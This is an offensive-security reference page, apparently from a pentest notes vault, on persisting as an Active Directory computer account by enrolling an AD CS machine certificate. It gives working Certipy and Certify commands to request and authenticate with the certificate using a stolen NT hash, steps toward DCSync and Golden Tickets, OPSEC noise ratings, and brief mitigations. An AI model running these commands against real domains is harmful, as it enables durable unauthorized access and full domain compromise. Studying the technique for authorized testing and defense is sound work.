persist2-machine-account-persistence-via-certificates.md (3552B)
1 --- 2 title: "PERSIST2 — Machine Account Persistence via Certificates" 3 description: "Machine accounts rotate their password automatically every ~30 days, which normally limits how long a stolen machine hash stays useful. A certificate…" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "persistence"] 7 tools: ["Certipy", "Certify", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/PERSIST2 — Machine Account Persistence via Certificates.md" 11 --- 12 # PERSIST2 — Machine Account Persistence via Certificates 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | Account Persistence (machine) | 19 | **Difficulty** | Low–Medium | 20 | **Pre-requisites** | SYSTEM/admin on a host (or control of a machine account) + a machine-enrolment template | 21 | **Tools** | Certipy, Certify | 22 | **OPSEC Noise** | Low — a normal machine enrolment | 23 | **One-liner** | Enrol an authentication certificate for a **computer account** and keep it — it outlives the 30-day machine-password rotation, giving durable access as `HOST$`. | 24 25 *** 26 27 ## What Is PERSIST2? 28 29 Machine accounts rotate their password automatically every ~30 days, which normally limits how long a stolen machine hash stays useful. A **certificate** side-steps that: enrol a cert for the computer account and it stays valid for the template's full lifetime (often 1 year), regardless of password rotation. Since computer accounts are frequent RBCD/Kerberoast targets — and a DC's account is a DCSync-capable identity — this is potent persistence. 30 31 *** 32 33 ## Step 1 — Enrol a Machine Certificate 34 35 ```bash 36 # As SYSTEM on the host (or with the machine account's hash), request a Machine cert 37 certipy-ad req \ 38 -u 'HOST$@domain.htb' -hashes :<MACHINE_NTHASH> \ 39 -dc-ip $TARGET -ca 'DOMAIN-CA' -template 'Machine' 40 # -> host.pfx (survives the 30-day rotation) 41 ``` 42 43 ```powershell 44 # From SYSTEM on the box, the machine context can enrol directly 45 .\Certify.exe request /ca:DC01\DOMAIN-CA /template:Machine /machine 46 ``` 47 48 *** 49 50 ## Step 2 — Authenticate as the Machine Later 51 52 ```bash 53 certipy-ad auth -pfx host.pfx -dc-ip $TARGET 54 # -> HOST$ TGT + machine NT hash (even after password rotation) 55 ``` 56 57 *** 58 59 ## Step 3 — Leverage the Machine Identity 60 61 - **RBCD:** if `HOST$` can be configured for delegation, impersonate any user to services on it. 62 - **DC machine account:** a `DC01$` cert authenticates as the DC → DCSync `krbtgt` → Golden Ticket. 63 - **Re-loot:** each PKINIT auth returns the machine's *current* NT hash, self-healing after rotation. 64 65 > [!warning] DC machine persistence = domain persistence 66 > A certificate for a Domain Controller's computer account is effectively domain-level persistence. Consider it alongside DPERSIST1. 67 68 *** 69 70 ## OPSEC Considerations 71 72 | Action | Log | Noise | 73 | :-- | :-- | :-- | 74 | Machine cert request | Event 4886/4887 on CA | 🟢 Low | 75 | PKINIT as HOST$ | Event 4768 on DC | 🟢 Low | 76 77 *** 78 79 ## Mitigation 80 81 - Revoke machine certificates when a host is reimaged or suspected compromised. 82 - Constrain which templates permit machine enrolment; audit certs issued to computer accounts. 83 - Tier DCs; treat DC machine-cert issuance as high severity. 84 85 *** 86 87 ## See Also 88 89 - _ADCS Attack Methodology Guide · THEFT3 — Machine Certificate Theft via DPAPI · PERSIST1 — Active User Credential Theft via Certificates 90 - Sources: SpecterOps *Certified Pre-Owned*; [Certipy Wiki](https://github.com/ly4k/Certipy/wiki)